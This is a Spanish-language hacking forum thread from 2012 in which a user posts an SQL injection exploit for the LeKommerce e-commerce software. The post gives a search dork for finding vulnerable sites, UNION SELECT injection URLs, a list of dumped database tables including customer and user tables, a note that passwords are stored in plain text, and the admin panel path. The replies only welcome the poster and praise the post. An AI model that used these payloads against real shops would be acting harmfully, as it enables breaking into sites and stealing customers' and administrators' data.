comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Exploit SQLI LeKommerce

  • 2 Respuestas
  • 1731 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado MaztoR

  • *
  • Underc0der
  • Mensajes: 56
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • MaztoR [IN]-Security
    • Email
  • Skype: Maztor-
« en: Abril 05, 2012, 09:25:16 pm »


Código: You are not allowed to view links. Register or Login
# Author: Mazt0r
# Exploit Title: Online Shop SQLI
# Date: 04 DE MARZO DE 2012
# software: LeKommerce
# link: http://www.lekommerce.com/
# Version: "ESPECIFIC VERSION NO TESTED"
# Category: Commerce online
# Tested on: Linux

D0rk: inurl:secc.php?id=

=====================================
Exploit :
======================
http://localhost/path/secc.php?id={sqli}
======================
Example:
======================
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--
======================
dbs:
======================
+--------------------------------+
| t_clientes |
| t_colores |
| t_colores_idiomas |
| t_configuracionglobal |
| t_emailing |
| t_emailingcliente |
| t_facturascompra |
| t_facturasventa |
| t_familias |
| t_familias_idiomas |
| t_formaspago |
| t_idiomas |
| t_incidencias |
| t_iva |
| t_marcas |
| t_menusuperior |
| t_noticias |
| t_productos |
| t_productos_idiomas |
| t_proveedores |
| t_provincias |
| t_rel_productos_tallas_colores |
| t_rel_tallas_colores |
| t_seccionesproductos |
| t_seccionesproductos_idiomas |
| t_series |
| t_subfamilias |
| t_subfamilias_idiomas |
| t_tallas |
| t_tallas_idiomas |
| t_tiposperfiles |
| t_traducciones |
| t_usuarios |
+--------------------------------+

PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!

----------------------------------
PANEL ADMIN: [/lib/validar_index.php]
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------



LINKS EXPLOIT REPORTS
-----------------------------------------

OSDVB:You are not allowed to view links. Register or Login
EXPLOIT DB: You are not allowed to view links. Register or Login
PACKET-STORM:You are not allowed to view links. Register or Login
SECUNIA: You are not allowed to view links. Register or Login
« Última modificación: Abril 05, 2012, 10:37:30 pm por MaztoR »
-------------------------------------
| Twitter: @Mazt0r                
| Site: You are not allowed to view links. Register or Login        
| Skype: Maztor-                    
-------------------------------------

Desconectado 54NDR4

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • Mis Besos desencriptadores ven tu Codigo Fuente ♥
    • Ver Perfil
    • Email
« Respuesta #1 en: Abril 05, 2012, 09:31:46 pm »
Bienvenido y que bueno que estes activo en el foro nuevamente  :)


besos  :-*

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #2 en: Abril 06, 2012, 08:17:36 am »
Re-Bienvenido Mazt0r, buen aporte.

Un saludo.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

Iniciado por ..::key-m0rt::..

Respuestas: 0
Vistas: 1601
Último mensaje Marzo 23, 2010, 12:38:21 pm
por ..::key-m0rt::..
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface]

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1406
Último mensaje Julio 21, 2010, 07:43:44 pm
por Xt3mP
LFI+SQLI [Incluyendo ficheros a travez de valores enteros]

Iniciado por q3rv0

Respuestas: 4
Vistas: 1636
Último mensaje Julio 24, 2013, 01:43:36 pm
por M5f3r0
SQLi bypaseando el firewall y pasando el examen!

Iniciado por arthusu

Respuestas: 5
Vistas: 2308
Último mensaje Junio 07, 2013, 10:12:11 pm
por morodog
Explicacion practica de sqli [a pedido de staRgan]

Iniciado por blozzter

Respuestas: 0
Vistas: 1410
Último mensaje Agosto 24, 2011, 09:15:14 pm
por blozzter